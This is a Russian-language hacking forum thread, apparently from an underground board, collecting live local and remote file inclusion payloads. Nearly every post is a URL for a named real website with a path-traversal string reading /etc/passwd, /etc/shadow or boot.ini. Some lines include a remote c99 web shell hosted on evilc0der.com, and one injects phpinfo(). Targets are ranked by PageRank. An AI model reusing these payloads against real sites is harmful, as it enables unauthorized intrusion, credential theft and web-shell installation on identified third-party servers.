PHP Иньекции

Code:

http://www.mirandasalon.kiev.ua/index.php?menu_lang=0&page=../../../../../../../etc/passwd&dop_menu=visible&menu_poz=1&tk=0&n_img=1

 

Code:

http://www.pdn.dkp.go.id/index.php?mod=../../../../../../../../../../../../etc/passwd

 

PHP:

http://www.dosuga.net/?type=anek&seq=doc&mk=on&num=

http://www.dosuga.net/anek/doc/titul.txt

PHP:

http://www.dosuga.net/?type=anek&seq=xaker&mk=on&num=

http://www.dosuga.net/anek/xaker/titul.txt

http://www.dosuga.net/?type=../&seq=../%3C!--/*


P.S
sorry if something is wrong

 

PR7
http://www.phedigital.com/portal/es/load.php?file=some_file
Какой то суровый инсклуд =\ самого себя можно заинсклудить, /etc/passwd не хочет, сессии просто выдаются на экран, а не инсклудятся ..

 

удаленный инклуд

Code:

http://www.rocklandkaratedo.com/index.php?id=[url]

 

Code:

http://www.zorgbelang-flevoland.nl/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

----------------------------------------------------------

Code:

http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

------------------------------------------------------------

Code:

http://paulozambroza.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

----------------------------------------------------------------

Code:

http://www.domplan.pl/index.php?sl=../../../../../../../etc/passwd%00

----------------------------------------------------------
The End!

 

Code:

http://www.guidoforster.ch/index.php?id=../../../../../../../../../../../../../../../etc/passwd%00

 

mutazu.com

Code:

http://www.mutazu.com/products.php?cat_id=7&product_id=101&s=../../../../../../../../etc/passwd

 

Code:

http://www.anastacionoticias.com.br/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

----------------------------------------------------------------

Code:

http://psico.no.comunidades.net/index.php?pagina=../../../../../../../../../../../../../etc/passwd%00

----------------------------------------------------------------
The End!

 

38 штучек, PR разный, от 0 до 5-ти...

[PR 5] http://www.americanprimrosesociety.org/index.php?content=../../../../../etc/passwd&menu=societymenu.php
[PR 5] http://www.asianreviewofbooks.com/arb/textout.php3?filename=../../../../../../etc/passwd%00
[PR 5] http://www.avatiach.com/index.jsp?WORKING_CLASS=avatiach.ShowHtml&fileName=../../../../etc/passwd
[PR 4] http://gpu4vision.icg.tugraz.at/index.php?content=../../../../../etc/passwd
[PR 1] http://www.saamoa.ch/theartofbob/index.php?lang=en&content_main=../../../../etc/passwd
[PR 0] http://www.lilheartsandhands.com/index.php?contentm=../../../../etc/passwd
[PR 4, PR домена - 8] http://web.auth.gr/dent/web/el/depts/index.php?lab=endo&content=../../../../../etc/passwd
[PR 3] http://www.tvdn.eu/index.php?content=../../../../../../../etc/passwd
[PR 2] http://www.go4it-stafette.ch/index.php?content=http://www.evilc0der.com/c99.txt
[PR 0] http://www.indefinitez.com/index.php?page=../../../../etc/passwd
[PR 1] http://www.deganferah.ch/index.php?content=../../../etc/passwd
[PR 0] http://www.spksteuer.de/index.php?open=42&content=../../../../etc/passwd
[PR 4] http://www.curriculumrenewal.com/index.php?content=http://www.evilc0der.com/c99.txt
[PR 4] http://www.seawhale.com.tw/en/index.php?content=../../../../../etc/passwd
[PR 1] http://www.tip-automobile.ch/index.php?content=../../../etc/passwd
[PR 1] http://www.physio-jungeundrudolph.de/index.php?content=../../../../../../etc/passwd
[PR 0] http://www.ebfs.eu/de/?directory=News&page=../../../../../etc/passwd
[PR 4] http://www.paloaltophoto.com/auto_page.php?page=../../../../../etc/passwd (зрите в сорцы страницы)
[PR 3] http://www.hrchiro.com/index.cfm?page=../../../../../etc/shadow
[PR 0] http://www.dreamnet-comm.com/index.php?body=../../../etc/passwd
[PR 3] http://www.jakuzisattempt.com/read.php?filename=../../../etc/passwd
[PR 1] http://www.learn2spin.co.uk/admin/coastadmin.php?filename=../../../../../etc/passwd
[PR NA] http://www.smok-krakow.ovh.org/index.php?page=article.php&filename=../../../../../../etc/passwd
[PR 0] http://www.detaling.ru/page.php?filename=../../../../../../etc/passwd
[PR 0] http://www.rubinpartners.com.au/?page=../../../../../etc/passwd
[PR 1] http://www.gamillahphotography.com/index.php?page=../../../../etc/passwd
[PR 3] http://www.sebmedia.com/index.php?page=../../../../../etc/passwd
[PR 1] http://www.midirectory.com/cgi-bin/Dispatcher.php?ACTION=StaticPage.php&PAGE=../../../etc/passwd
[PR 1] http://www.indydesserts.com/?page=../../../../../../../../etc/passwd
[PR 3] https://www.talentxpress.com/html.php?page=../../../../etc/passwd
[PR 0] http://goalandsales.com/index.php?page=../../../../../etc/passwd
[PR 0] http://www.alohamortgage.com/?page=../../../etc/passwd
[PR 0] https://www.talentflare.com/html.php?page=../../../../etc/passwd
[PR 3] http://www.labortemps.com/pages/labor-temp.php?page=../../../../../../../../../etc/passwd
[PR 0] http://www.mercurimport.com/index.php?Page=../../../etc/passwd
[PR 0] http://www.agpe.com.au/index.php?page=../../../../etc/passwd
[PR 0] http://www.thebandicoots.com/index.php?page=../../../etc/passwd
[PR 1] http://www.puebloway.org/index.cfm?page=../../../../boot.ini (Win)

jokester, не ругайся, насяльника, на баяны пробил вроде! =)

 

Мой первый ПХП-инжекшн:

Code:

http://rfid-labs.dk/index.php?SubMenu=menu/submenu4.php&HeaderTextCode=4&ContentFile=/etc/passwd

Мой первый удаленный ПХП-инжекшн:

Code:

http://thetalentmentors.com/print.php?contentFile=RFI

.

 

bagfix.com - PR1 =\

Code:

http://www.bagfix.com/index.php?fid=../../../../../../../../../etc/passwd

 

вопрос про тему
а почему собственно в данную тему выкладывают только PHP-инклюдинг, когда тема называется PHP-инъекции?

Вообще-то PHP-инъекция это - выполнение постороннего PHP кода на серверной стороне:

Code:

http://www.ishmaelkhaldi.com/documents/blog.php?asd=blog.php&category_id=<?phpinfo()?>

 

http://www.hitronetic.com/nouveausite/index1.php?langue=en&filemenu=menu.php?filecontent=../../../../etc/passwd

 

thehilltimes.ca

Code:

http://www.thehilltimes.ca/members/login.php?fail=2&destination=/html/index.php?display=story&full_path=../../../../../../../../etc/passwd

joomler для вопросов есть отделная ветка =) а так это инклуд файлов и именно с этим ты ничего не сделаешь, как вариант ищи конфиги и так далее, где можно выудить пароли или еще что

 

Metro cash&carry

http://www.metro.ro/index.php?screen=SiteServicesQuality/content&page=../../../../../etc/passwd%00

 

http://www.msu.ac.zw/info/news/m2006.showlist.php?file=../../../../../../../../../../../../etc/passwd

 

nexx.ca

Code:

http://www.nexx.ca/customer-care-faq.php?id=../../../../../etc/passwd

 

RFI ХАЧУ ПЛЮСЕГ! =)

• http://www.birminghamsciencecity.com/about/people/working.php?incFile=RFI?
• http://www.cahi.co.za/index.php?page=RFI
• http://www.statuscapital.co.za/index.php?page=RFI?
• http://tioline.ru/index.php?page=RFI?
• http://www.eloduna.hu/index.php?page=RFI

 

Safe-mode